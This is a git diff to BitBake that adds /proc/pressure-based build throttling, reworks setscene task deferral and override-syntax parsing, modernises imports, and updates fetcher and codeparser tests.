diff --git a/bitbake/lib/bb/monitordisk.py b/bitbake/lib/bb/monitordisk.py
index e7c07264a8..4d243af30b 100644
--- a/bitbake/lib/bb/monitordisk.py
+++ b/bitbake/lib/bb/monitordisk.py
@@ -229,9 +229,10 @@ class diskMonitor:
                 freeInode = st.f_favail
 
                 if minInode and freeInode < minInode:
-                    # Some filesystems use dynamic inodes so can't run out
-                    # (e.g. btrfs). This is reported by the inode count being 0.
-                    if st.f_files == 0:
+                    # Some filesystems use dynamic inodes so can't run out.
+                    # This is reported by the inode count being 0 (btrfs) or the free
+                    # inode count being -1 (cephfs).
+                    if st.f_files == 0 or st.f_favail == -1:
                         self.devDict[k][2] = None
                         continue
                     # Always show warning, the self.checked would always be False if the action is WARN
diff --git a/bitbake/lib/bb/msg.py b/bitbake/lib/bb/msg.py
index 2d88c4e72d..1b1a23bb50 100644
--- a/bitbake/lib/bb/msg.py
+++ b/bitbake/lib/bb/msg.py
@@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter):
 #
 
 loggerDefaultLogLevel = BBLogFormatter.NOTE
-loggerDefaultVerbose = False
-loggerVerboseLogs = False
 loggerDefaultDomains = {}
 
 def init_msgconfig(verbose, debug, debug_domains=None):
     """
     Set default verbosity and debug levels config the logger
     """
-    bb.msg.loggerDefaultVerbose = verbose
-    if verbose:
-        bb.msg.loggerVerboseLogs = True
-
     if debug:
         bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1
     elif verbose:
diff --git a/bitbake/lib/bb/parse/ast.py b/bitbake/lib/bb/parse/ast.py
index eb8cfa21b8..9f46f3f35a 100644
--- a/bitbake/lib/bb/parse/ast.py
+++ b/bitbake/lib/bb/parse/ast.py
@@ -97,6 +97,7 @@ class DataNode(AstNode):
     def eval(self, data):
         groupd = self.groupd
         key = groupd["var"]
+        key = key.replace(":", "_")
         loginfo = {
             'variable': key,
             'file': self.filename,
@@ -207,6 +208,7 @@ class ExportFuncsNode(AstNode):
     def eval(self, data):
 
         for func in self.n:
+            func = func.replace(":", "_")
             calledfunc = self.classname + "_" + func
 
             if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False):
diff --git a/bitbake/lib/bb/parse/parse_py/BBHandler.py b/bitbake/lib/bb/parse/parse_py/BBHandler.py
index 6e216effb8..8781129fc1 100644
--- a/bitbake/lib/bb/parse/parse_py/BBHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/BBHandler.py
@@ -22,7 +22,7 @@ from .ConfHandler import include, init
 # For compatibility
 bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"])
 
-__func_start_regexp__    = re.compile(r"(((?P<py>python)|(?P<fr>fakeroot))\s*)*(?P<func>[\w\.\-\+\{\}\$]+)?\s*\(\s*\)\s*{$" )
+__func_start_regexp__    = re.compile(r"(((?P<py>python(?=(\s|\()))|(?P<fr>fakeroot(?=\s)))\s*)*(?P<func>[\w\.\-\+\{\}\$:]+)?\s*\(\s*\)\s*{$" )
 __inherit_regexp__       = re.compile(r"inherit\s+(.+)" )
 __export_func_regexp__   = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" )
 __addtask_regexp__       = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*")
diff --git a/bitbake/lib/bb/parse/parse_py/ConfHandler.py b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
index af64d3446e..a7e81bd6ad 100644
--- a/bitbake/lib/bb/parse/parse_py/ConfHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
@@ -20,7 +20,7 @@ from bb.parse import ParseError, resolve_file, ast, logger, handle
 __config_regexp__  = re.compile( r"""
     ^
     (?P<exp>export\s+)?
-    (?P<var>[a-zA-Z0-9\-_+.${}/~]+?)
+    (?P<var>[a-zA-Z0-9\-_+.${}/~:]+?)
     (\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])?
 
     \s* (
diff --git a/bitbake/lib/bb/persist_data.py b/bitbake/lib/bb/persist_data.py
index 7357ab2d44..56c983f816 100644
--- a/bitbake/lib/bb/persist_data.py
+++ b/bitbake/lib/bb/persist_data.py
@@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'.
 #
 
 import collections
+import collections.abc
+import contextlib
+import functools
 import logging
 import os.path
+import sqlite3
 import sys
 import warnings
-from bb.compat import total_ordering
-from collections import Mapping
-import sqlite3
-import contextlib
+from collections.abc import Mapping
 
 sqlversion = sqlite3.sqlite_version_info
 if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
@@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
 
 logger = logging.getLogger("BitBake.PersistData")
 
-@total_ordering
-class SQLTable(collections.MutableMapping):
+@functools.total_ordering
+class SQLTable(collections.abc.MutableMapping):
     class _Decorators(object):
         @staticmethod
         def retry(*, reconnect=True):
diff --git a/bitbake/lib/bb/process.py b/bitbake/lib/bb/process.py
index 2dc472a86f..24c588e533 100644
--- a/bitbake/lib/bb/process.py
+++ b/bitbake/lib/bb/process.py
@@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options):
             stderr = stderr.decode("utf-8")
 
     if pipe.returncode != 0:
+        if log:
+            # Don't duplicate the output in the exception if logging it
+            raise ExecutionError(cmd, pipe.returncode, None, None)
         raise ExecutionError(cmd, pipe.returncode, stdout, stderr)
     return stdout, stderr
diff --git a/bitbake/lib/bb/providers.py b/bitbake/lib/bb/providers.py
index 81459c36d5..484e1ea4f3 100644
--- a/bitbake/lib/bb/providers.py
+++ b/bitbake/lib/bb/providers.py
@@ -151,7 +151,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
         if item:
             itemstr = " (for item %s)" % item
         if preferred_file is None:
-            logger.info("preferred version %s of %s not available%s", pv_str, pn, itemstr)
+            logger.warning("preferred version %s of %s not available%s", pv_str, pn, itemstr)
             available_vers = []
             for file_set in pkg_pn:
                 for f in file_set:
@@ -163,7 +163,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
                         available_vers.append(ver_str)
             if available_vers:
                 available_vers.sort()
-                logger.info("versions of %s available: %s", pn, ' '.join(available_vers))
+                logger.warning("versions of %s available: %s", pn, ' '.join(available_vers))
         else:
             logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr)
 
diff --git a/bitbake/lib/bb/runqueue.py b/bitbake/lib/bb/runqueue.py
index 30cab5379e..886eef1f27 100644
--- a/bitbake/lib/bb/runqueue.py
+++ b/bitbake/lib/bb/runqueue.py
@@ -24,6 +24,7 @@ import pickle
 from multiprocessing import Process
 import shlex
 import pprint
+import time
 
 bblogger = logging.getLogger("BitBake")
 logger = logging.getLogger("BitBake.RunQueue")
@@ -142,6 +143,55 @@ class RunQueueScheduler(object):
                 self.buildable.append(tid)
 
         self.rev_prio_map = None
+        self.is_pressure_usable()
+
+    def is_pressure_usable(self):
+        """
+        If monitoring pressure, return True if pressure files can be open and read. For example
+        openSUSE /proc/pressure/* files have readable file permissions but when read the error EOPNOTSUPP (Operation not supported)
+        is returned.
+        """
+        if self.rq.max_cpu_pressure or self.rq.max_io_pressure or self.rq.max_memory_pressure:
+            try:
+                with open("/proc/pressure/cpu") as cpu_pressure_fds, \
+                    open("/proc/pressure/io") as io_pressure_fds, \
+                    open("/proc/pressure/memory") as memory_pressure_fds:
+
+                    self.prev_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
+                    self.prev_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
+                    self.prev_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
+                    self.prev_pressure_time = time.time()
+                self.check_pressure = True
+            except:
+                bb.note("The /proc/pressure files can't be read. Continuing build without monitoring pressure")
+                self.check_pressure = False
+        else:
+            self.check_pressure = False
+
+    def exceeds_max_pressure(self):
+        """
+        Monitor the difference in total pressure at least once per second, if
+        BB_PRESSURE_MAX_{CPU|IO|MEMORY} are set, return True if above threshold.
+        """
+        if self.check_pressure:
+            with open("/proc/pressure/cpu") as cpu_pressure_fds, \
+                open("/proc/pressure/io") as io_pressure_fds, \
+                open("/proc/pressure/memory") as memory_pressure_fds:
+                # extract "total" from /proc/pressure/{cpu|io}
+                curr_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
+                curr_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
+                curr_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
+                exceeds_cpu_pressure =  self.rq.max_cpu_pressure and (float(curr_cpu_pressure) - float(self.prev_cpu_pressure)) > self.rq.max_cpu_pressure
+                exceeds_io_pressure =  self.rq.max_io_pressure and (float(curr_io_pressure) - float(self.prev_io_pressure)) > self.rq.max_io_pressure
+                exceeds_memory_pressure = self.rq.max_memory_pressure and (float(curr_memory_pressure) - float(self.prev_memory_pressure)) > self.rq.max_memory_pressure
+                now = time.time()
+                if now - self.prev_pressure_time > 1.0:
+                    self.prev_cpu_pressure = curr_cpu_pressure
+                    self.prev_io_pressure = curr_io_pressure
+                    self.prev_memory_pressure = curr_memory_pressure
+                    self.prev_pressure_time = now
+            return (exceeds_cpu_pressure or exceeds_io_pressure or exceeds_memory_pressure)
+        return False
 
     def next_buildable_task(self):
         """
@@ -155,6 +205,12 @@ class RunQueueScheduler(object):
         if not buildable:
             return None
 
+        # Bitbake requires that at least one task be active. Only check for pressure if
+        # this is the case, otherwise the pressure limitation could result in no tasks
+        # being active and no new tasks started thereby, at times, breaking the scheduler.
+        if self.rq.stats.active and self.exceeds_max_pressure():
+            return None
+
         # Filter out tasks that have a max number of threads that have been exceeded
         skip_buildable = {}
         for running in self.rq.runq_running.difference(self.rq.runq_complete):
@@ -1256,8 +1312,8 @@ class RunQueue:
             "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
             "sigdata" : bb.parse.siggen.get_taskdata(),
             "logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
-            "logdefaultverbose" : bb.msg.loggerDefaultVerbose,
-            "logdefaultverboselogs" : bb.msg.loggerVerboseLogs,
+            "build_verbose_shell" : self.cooker.configuration.build_verbose_shell,
+            "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout,
             "logdefaultdomain" : bb.msg.loggerDefaultDomains,
             "prhost" : self.cooker.prhost,
             "buildname" : self.cfgData.getVar("BUILDNAME"),
@@ -1700,6 +1756,9 @@ class RunQueueExecute:
 
         self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
         self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"
+        self.max_cpu_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_CPU")
+        self.max_io_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_IO")
+        self.max_memory_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_MEMORY")
 
         self.sq_buildable = set()
         self.sq_running = set()
@@ -1735,6 +1794,29 @@ class RunQueueExecute:
         if self.number_tasks <= 0:
              bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)
 
+        lower_limit = 1.0
+        upper_limit = 1000000.0
+        if self.max_cpu_pressure:
+            self.max_cpu_pressure = float(self.max_cpu_pressure)
+            if self.max_cpu_pressure < lower_limit:
+                bb.fatal("Invalid BB_PRESSURE_MAX_CPU %s, minimum value is %s." % (self.max_cpu_pressure, lower_limit))
+            if self.max_cpu_pressure > upper_limit:
+                bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_CPU is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_cpu_pressure))
+
+        if self.max_io_pressure:
+            self.max_io_pressure = float(self.max_io_pressure)
+            if self.max_io_pressure < lower_limit:
+                bb.fatal("Invalid BB_PRESSURE_MAX_IO %s, minimum value is %s." % (self.max_io_pressure, lower_limit))
+            if self.max_io_pressure > upper_limit:
+                bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_IO is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
+
+        if self.max_memory_pressure:
+            self.max_memory_pressure = float(self.max_memory_pressure)
+            if self.max_memory_pressure < lower_limit:
+                bb.fatal("Invalid BB_PRESSURE_MAX_MEMORY %s, minimum value is %s." % (self.max_memory_pressure, lower_limit))
+            if self.max_memory_pressure > upper_limit:
+                bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_MEMORY is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
+            
         # List of setscene tasks which we've covered
         self.scenequeue_covered = set()
         # List of tasks which are covered (including setscene ones)
@@ -1893,6 +1975,20 @@ class RunQueueExecute:
                 self.setbuildable(revdep)
                 logger.debug(1, "Marking task %s as buildable", revdep)
 
+        found = None
+        for t in sorted(self.sq_deferred.copy()):
+            if self.sq_deferred[t] == task:
+                # Allow the next deferred task to run. Any other deferred tasks should be deferred after that task.
+                # We shouldn't allow all to run at once as it is prone to races.
+                if not found:
+                    bb.note("Deferred task %s now buildable" % t)
+                    del self.sq_deferred[t]
+                    update_scenequeue_data([t], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
+                    found = t
+                else:
+                    bb.note("Deferring %s after %s" % (t, found))
+                    self.sq_deferred[t] = found
+
     def task_complete(self, task):
         self.stats.taskCompleted()
         bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData)
@@ -1934,6 +2030,10 @@ class RunQueueExecute:
             logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks))
             err = True
 
+        for tid in self.scenequeue_covered.intersection(self.scenequeue_notcovered):
+            # No task should end up in both covered and uncovered, that is a bug.
+            logger.error("Setscene task %s in both covered and notcovered." % tid)
+
         for tid in self.rqdata.runq_setscene_tids:
             if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
                 err = True
@@ -1998,8 +2098,6 @@ class RunQueueExecute:
                             logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
                             self.sq_task_failoutright(nexttask)
                             return True
-                        else:
-                            self.sqdata.outrightfail.remove(nexttask)
                     if nexttask in self.sqdata.outrightfail:
                         logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
                         self.sq_task_failoutright(nexttask)
@@ -2150,7 +2248,8 @@ class RunQueueExecute:
         if self.sq_deferred:
             tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
             logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
-            self.sq_task_failoutright(tid)
+            if tid not in self.runq_complete:
+                self.sq_task_failoutright(tid)
             return True
 
         if len(self.failed_tids) != 0:
@@ -2264,10 +2363,16 @@ class RunQueueExecute:
             self.updated_taskhash_queue.remove((tid, unihash))
 
             if unihash != self.rqdata.runtaskentries[tid].unihash:
-                hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash))
-                self.rqdata.runtaskentries[tid].unihash = unihash
-                bb.parse.siggen.set_unihash(tid, unihash)
-                toprocess.add(tid)
+                # Make sure we rehash any other tasks with the same task hash that we're deferred against.
+                torehash = [tid]
+                for deftid in self.sq_deferred:
+                    if self.sq_deferred[deftid] == tid:
+                        torehash.append(deftid)
+                for hashtid in torehash:
+                    hashequiv_logger.verbose("Task %s unihash changed to %s" % (hashtid, unihash))
+                    self.rqdata.runtaskentries[hashtid].unihash = unihash
+                    bb.parse.siggen.set_unihash(hashtid, unihash)
+                    toprocess.add(hashtid)
 
         # Work out all tasks which depend upon these
         total = set()
@@ -2406,6 +2511,14 @@ class RunQueueExecute:
 
         if update_tasks:
             self.sqdone = False
+            for mc in sorted(self.sqdata.multiconfigs):
+                for tid in sorted([t[0] for t in update_tasks]):
+                    if mc_from_tid(tid) != mc:
+                        continue
+                    h = pending_hash_index(tid, self.rqdata)
+                    if h in self.sqdata.hashes and tid != self.sqdata.hashes[h]:
+                        self.sq_deferred[tid] = self.sqdata.hashes[h]
+                        bb.note("Deferring %s after %s" % (tid, self.sqdata.hashes[h]))
             update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
 
         for (tid, harddepfail, origvalid) in update_tasks:
@@ -2421,6 +2534,9 @@ class RunQueueExecute:
 
         for dep in sorted(self.sqdata.sq_deps[task]):
             if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
+                if dep in self.scenequeue_covered or dep in self.scenequeue_notcovered:
+                    # dependency could be already processed, e.g. noexec setscene task
+                    continue
                 logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
                 self.sq_task_failoutright(dep)
                 continue
@@ -2743,6 +2859,19 @@ def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
     sqdata.stamppresent = set()
     sqdata.valid = set()
 
+    sqdata.hashes = {}
+    sqrq.sq_deferred = {}
+    for mc in sorted(sqdata.multiconfigs):
+        for tid in sorted(sqdata.sq_revdeps):
+            if mc_from_tid(tid) != mc:
+                continue
+            h = pending_hash_index(tid, rqdata)
+            if h not in sqdata.hashes:
+                sqdata.hashes[h] = tid
+            else:
+                sqrq.sq_deferred[tid] = sqdata.hashes[h]
+                bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
+
     update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
 
 def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
@@ -2754,6 +2883,8 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
             sqdata.stamppresent.remove(tid)
         if tid in sqdata.valid:
             sqdata.valid.remove(tid)
+        if tid in sqdata.outrightfail:
+            sqdata.outrightfail.remove(tid)
 
         (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
 
@@ -2781,28 +2912,20 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
 
     sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)
 
-    sqdata.hashes = {}
-    for mc in sorted(sqdata.multiconfigs):
-        for tid in sorted(sqdata.sq_revdeps):
-            if mc_from_tid(tid) != mc:
-                continue
-            if tid in sqdata.stamppresent:
-                continue
-            if tid in sqdata.valid:
-                continue
-            if tid in sqdata.noexec:
-                continue
-            if tid in sqrq.scenequeue_notcovered:
-                continue
-            sqdata.outrightfail.add(tid)
-
-            h = pending_hash_index(tid, rqdata)
-            if h not in sqdata.hashes:
-                sqdata.hashes[h] = tid
-            else:
-                sqrq.sq_deferred[tid] = sqdata.hashes[h]
-                bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
-
+    for tid in tids:
+        if tid in sqdata.stamppresent:
+            continue
+        if tid in sqdata.valid:
+            continue
+        if tid in sqdata.noexec:
+            continue
+        if tid in sqrq.scenequeue_covered:
+            continue
+        if tid in sqrq.scenequeue_notcovered:
+            continue
+        if tid in sqrq.sq_deferred:
+            continue
+        sqdata.outrightfail.add(tid)
 
 class TaskFailure(Exception):
     """
diff --git a/bitbake/lib/bb/server/process.py b/bitbake/lib/bb/server/process.py
index b66fbe0acd..4bdb84ae37 100644
--- a/bitbake/lib/bb/server/process.py
+++ b/bitbake/lib/bb/server/process.py
@@ -25,6 +25,7 @@ import subprocess
 import errno
 import re
 import datetime
+import gc
 import bb.server.xmlrpcserver
 from bb import daemonize
 from multiprocessing import queues
@@ -152,7 +153,8 @@ class ProcessServer(multiprocessing.Process):
                 conn = newconnections.pop(-1)
                 fds.append(conn)
                 self.controllersock = conn
-            elif self.timeout is None and not ready:
+
+            elif not self.timeout and not ready:
                 print("No timeout, exiting.")
                 self.quit = True
 
@@ -220,6 +222,7 @@ class ProcessServer(multiprocessing.Process):
                 try:
                     print("Running command %s" % command)
                     self.command_channel_reply.send(self.cooker.command.runCommand(command))
+                    print("Command Completed")
                 except Exception as e:
                    logger.exception('Exception in server main event loop running command %s (%s)' % (command, str(e)))
 
@@ -347,7 +350,12 @@ class ServerCommunicator():
             logger.info("No reply from server in 30s")
             if not self.recv.poll(30):
                 raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)")
-        return self.recv.get()
+        ret, exc = self.recv.get()
+        # Should probably turn all exceptions in exc back into exceptions?
+        # For now, at least handle BBHandledException
+        if exc and "BBHandledException" in exc:
+            raise bb.BBHandledException()
+        return ret, exc
 
     def updateFeatureSet(self, featureset):
         _, error = self.runCommand(["setFeatures", featureset])
@@ -586,7 +594,7 @@ class BBUIEventQueue:
         self.reader = ConnectionReader(readfd)
 
         self.t = threading.Thread()
-        self.t.setDaemon(True)
+        self.t.daemon = True
         self.t.run = self.startCallbackHandler
         self.t.start()
 
@@ -664,8 +672,10 @@ class ConnectionWriter(object):
 
     def send(self, obj):
         obj = multiprocessing.reduction.ForkingPickler.dumps(obj)
+        gc.disable()
         with self.wlock:
             self.writer.send_bytes(obj)
+        gc.enable()
 
     def fileno(self):
         return self.writer.fileno()
diff --git a/bitbake/lib/bb/siggen.py b/bitbake/lib/bb/siggen.py
index 26fa7f05ce..9d4f67aa90 100644
--- a/bitbake/lib/bb/siggen.py
+++ b/bitbake/lib/bb/siggen.py
@@ -318,7 +318,8 @@ class SignatureGeneratorBasic(SignatureGenerator):
         else:
             sigfile = stampbase + "." + task + ".sigbasedata" + "." + self.basehash[tid]
 
-        bb.utils.mkdirhier(os.path.dirname(sigfile))
+        with bb.utils.umask(0o002):
+            bb.utils.mkdirhier(os.path.dirname(sigfile))
 
         data = {}
         data['task'] = task
diff --git a/bitbake/lib/bb/tests/codeparser.py b/bitbake/lib/bb/tests/codeparser.py
index 826a2d2f6d..f1c4f618d8 100644
--- a/bitbake/lib/bb/tests/codeparser.py
+++ b/bitbake/lib/bb/tests/codeparser.py
@@ -111,9 +111,9 @@ ${D}${libdir}/pkgconfig/*.pc
         self.assertExecs(set(["sed"]))
 
     def test_parameter_expansion_modifiers(self):
-        # - and + are also valid modifiers for parameter expansion, but are
+        # -,+ and : are also valid modifiers for parameter expansion, but are
         # valid characters in bitbake variable names, so are not included here
-        for i in ('=', ':-', ':=', '?', ':?', ':+', '#', '%', '##', '%%'):
+        for i in ('=', '?', '#', '%', '##', '%%'):
             name = "foo%sbar" % i
             self.parseExpression("${%s}" % name)
             self.assertNotIn(name, self.references)
@@ -412,6 +412,32 @@ esac
         # Check final value
         self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['anothervalue', 'yetanothervalue', 'lastone'])
 
+    def test_contains_vardeps_override_operators(self):
+        # Check override operators handle dependencies correctly with the contains functionality
+        expr_plain = 'testval'
+        expr_prepend = '${@bb.utils.filter("TESTVAR1", "testval1", d)} '
+        expr_append = ' ${@bb.utils.filter("TESTVAR2", "testval2", d)}'
+        expr_remove = '${@bb.utils.contains("TESTVAR3", "no-testval", "testval", "", d)}'
+        # Check dependencies
+        self.d.setVar('ANOTHERVAR', expr_plain)
+        self.d.prependVar('ANOTHERVAR', expr_prepend)
+        self.d.appendVar('ANOTHERVAR', expr_append)
+        self.d.setVar('ANOTHERVAR:remove', expr_remove)
+        self.d.setVar('TESTVAR1', 'blah')
+        self.d.setVar('TESTVAR2', 'testval2')
+        self.d.setVar('TESTVAR3', 'no-testval')
+        deps, values = bb.data.build_dependencies("ANOTHERVAR", set(self.d.keys()), set(), set(), self.d)
+        self.assertEqual(sorted(values.splitlines()),
+                         sorted([
+                          expr_prepend + expr_plain + expr_append,
+                          '_remove of ' + expr_remove,
+                          'TESTVAR1{testval1} = Unset',
+                          'TESTVAR2{testval2} = Set',
+                          'TESTVAR3{no-testval} = Set',
+                          ]))
+        # Check final value
+        self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['testval2'])
+
     #Currently no wildcard support
     #def test_vardeps_wildcards(self):
     #    self.d.setVar("oe_libinstall", "echo test")
diff --git a/bitbake/lib/bb/tests/event.py b/bitbake/lib/bb/tests/event.py
index 9229b63d47..9ca7e9bc8e 100644
--- a/bitbake/lib/bb/tests/event.py
+++ b/bitbake/lib/bb/tests/event.py
@@ -6,17 +6,18 @@
 # SPDX-License-Identifier: GPL-2.0-only
 #
 
-import unittest
-import bb
-import logging
-import bb.compat
-import bb.event
+import collections
 import importlib
+import logging
+import pickle
 import threading
 import time
-import pickle
+import unittest
 from unittest.mock import Mock
 from unittest.mock import call
+
+import bb
+import bb.event
 from bb.msg import BBLogFormatter
 
 
@@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase):
 
     def _create_test_handlers(self):
         """ Method used to create a test handler ordered dictionary """
-        test_handlers = bb.compat.OrderedDict()
+        test_handlers = collections.OrderedDict()
         test_handlers["handler1"] = self._test_process.handler1
         test_handlers["handler2"] = self._test_process.handler2
         return test_handlers
@@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase):
 
     def test_clean_class_handlers(self):
         """ Test clean_class_handlers method """
-        cleanDict = bb.compat.OrderedDict()
+        cleanDict = collections.OrderedDict()
         self.assertEqual(cleanDict,
                          bb.event.clean_class_handlers())
 
diff --git a/bitbake/lib/bb/tests/fetch.py b/bitbake/lib/bb/tests/fetch.py
index 4702c99a7e..61dd5cccaf 100644
--- a/bitbake/lib/bb/tests/fetch.py
+++ b/bitbake/lib/bb/tests/fetch.py
@@ -371,6 +371,7 @@ class FetcherTest(unittest.TestCase):
         if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes":
             print("Not cleaning up %s. Please remove manually." % self.tempdir)
         else:
+            bb.process.run('chmod u+rw -R %s' % self.tempdir)
             bb.utils.prunedir(self.tempdir)
 
 class MirrorUriTest(FetcherTest):
@@ -471,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest):
         super(GitDownloadDirectoryNamingTest, self).setUp()
         self.recipe_url = "git://git.openembedded.org/bitbake"
         self.recipe_dir = "git.openembedded.org.bitbake"
-        self.mirror_url = "git://github.com/openembedded/bitbake.git"
+        self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
         self.mirror_dir = "github.com.openembedded.bitbake.git"
 
         self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40')
@@ -519,7 +520,7 @@ class TarballNamingTest(FetcherTest):
         super(TarballNamingTest, self).setUp()
         self.recipe_url = "git://git.openembedded.org/bitbake"
         self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz"
-        self.mirror_url = "git://github.com/openembedded/bitbake.git"
+        self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
         self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz"
 
         self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1')
@@ -553,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest):
         super(GitShallowTarballNamingTest, self).setUp()
         self.recipe_url = "git://git.openembedded.org/bitbake"
         self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz"
-        self.mirror_url = "git://github.com/openembedded/bitbake.git"
+        self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
         self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz"
 
         self.d.setVar('BB_GIT_SHALLOW', '1')
@@ -649,6 +650,58 @@ class FetcherLocalTest(FetcherTest):
         with self.assertRaises(bb.fetch2.UnpackError):
             self.fetchUnpack(['file://a;subdir=/bin/sh'])
 
+    def test_local_gitfetch_usehead(self):
+        # Create dummy local Git repo
+        src_dir = tempfile.mkdtemp(dir=self.tempdir,
+                                   prefix='gitfetch_localusehead_')
+        src_dir = os.path.abspath(src_dir)
+        bb.process.run("git init", cwd=src_dir)
+        bb.process.run("git commit --allow-empty -m'Dummy commit'",
+                       cwd=src_dir)
+        # Use other branch than master
+        bb.process.run("git checkout -b my-devel", cwd=src_dir)
+        bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
+                       cwd=src_dir)
+        stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
+        orig_rev = stdout[0].strip()
+
+        # Fetch and check revision
+        self.d.setVar("SRCREV", "AUTOINC")
+        url = "git://" + src_dir + ";protocol=file;usehead=1"
+        fetcher = bb.fetch.Fetch([url], self.d)
+        fetcher.download()
+        fetcher.unpack(self.unpackdir)
+        stdout = bb.process.run("git rev-parse HEAD",
+                                cwd=os.path.join(self.unpackdir, 'git'))
+        unpack_rev = stdout[0].strip()
+        self.assertEqual(orig_rev, unpack_rev)
+
+    def test_local_gitfetch_usehead_withname(self):
+        # Create dummy local Git repo
+        src_dir = tempfile.mkdtemp(dir=self.tempdir,
+                                   prefix='gitfetch_localusehead_')
+        src_dir = os.path.abspath(src_dir)
+        bb.process.run("git init", cwd=src_dir)
+        bb.process.run("git commit --allow-empty -m'Dummy commit'",
+                       cwd=src_dir)
+        # Use other branch than master
+        bb.process.run("git checkout -b my-devel", cwd=src_dir)
+        bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
+                       cwd=src_dir)
+        stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
+        orig_rev = stdout[0].strip()
+
+        # Fetch and check revision
+        self.d.setVar("SRCREV", "AUTOINC")
+        url = "git://" + src_dir + ";protocol=file;usehead=1;name=newName"
+        fetcher = bb.fetch.Fetch([url], self.d)
+        fetcher.download()
+        fetcher.unpack(self.unpackdir)
+        stdout = bb.process.run("git rev-parse HEAD",
+                                cwd=os.path.join(self.unpackdir, 'git'))
+        unpack_rev = stdout[0].strip()
+        self.assertEqual(orig_rev, unpack_rev)
+
 class FetcherNoNetworkTest(FetcherTest):
     def setUp(self):
         super().setUp()
